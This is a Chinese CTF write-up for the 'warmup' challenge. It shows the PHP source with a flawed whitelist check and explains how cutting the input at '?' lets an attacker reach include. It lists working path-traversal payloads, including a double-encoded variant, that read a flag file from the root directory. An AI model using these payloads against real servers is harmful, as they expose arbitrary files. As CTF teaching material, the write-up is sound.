warmup
进去题目,是一张图片,f12审计源代码,找到提示source.php
访问http://220.249.52.133:47207/source.php
得到源代码
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" />";
}
?>
看到源代码里有个白名单,里有个hint.php,于是我们试着访问http://220.249.52.133:47207/hint.php
返回的是
flag not here, and flag in ffffllllaaaagggg
说明flag是在ffffllllaaaagggg
审计代码
strpos($test,'9')//会返回9在$test这个字符串所在的位置
substr('123456789',0,9) //会从位置0开始对字符串截取9个长度
substr($test,0,strpos($test,'9')) //就会对从位置0开始对$test字符串截取8个长度
我们只要满足if的三个条件就可调用include函数来实现文件包含漏洞,所以我们要想办法使checkFile()函数返回Ture,构造?file=hint.php或者?file=source.php就可以返回True,但是这时并没有到达文件包含的目的,实际上这里可以构造?file=hint.php?[payload]就可以实现绕过来满足True
构造
file=hint.php?../../../../../../../ffffllllaaaagggg
即可得到flag
这里可能有点迷,为什么这个payload可以实现文件包含。
官方解释
看的有点迷,本地做个试验,这里flag.txt文件在根目录下,当前目录离根目录三个../
可以看到不管payload前加不加/,都是3个../可以包含flag.txt文件
按照官方的解释,因为我们的参数是有/../../../../../这样的路径所以符合最后一段话如果定义了路径,就会忽略/前的字符串而去找/../../../../flag.txt文件。
因为include会把第一个/后面的路径作为访问路径来寻找文件,所以当payload是12364../../../../../flag.txt时,以第一个/开始有4个../,而当payload是12364/../../../../flag.txt时,以第一个/开始也是4个../,这比前面没加字符串时,,多个1个../,原因不详。。
而且按照普通的形式应该可以读取绝对路径,但是这里加了字符串只能读取相对路径,也是很迷。
我们通过实验可以构造以下payload来利用第二个条件返回True
?file=hint.php?/../../../../ffffllllaaaagggg
?file=hint.php?../../../../../ffffllllaaaagggg
当然也可以利用第三个条件返回True
对?进行二次编码
?file=hint.php%253F../../../../../ffffllllaaaagggg
同样可以得到flag
当我们通过相对路径来抵达根目录时,../可以多加几个,以确保绝对达到根目录。
如,我们也可以构造payload
?file=hint.php?/../../../../../../../../ffffllllaaaagggg
这里我们直接构造8个../来确保抵达根目录。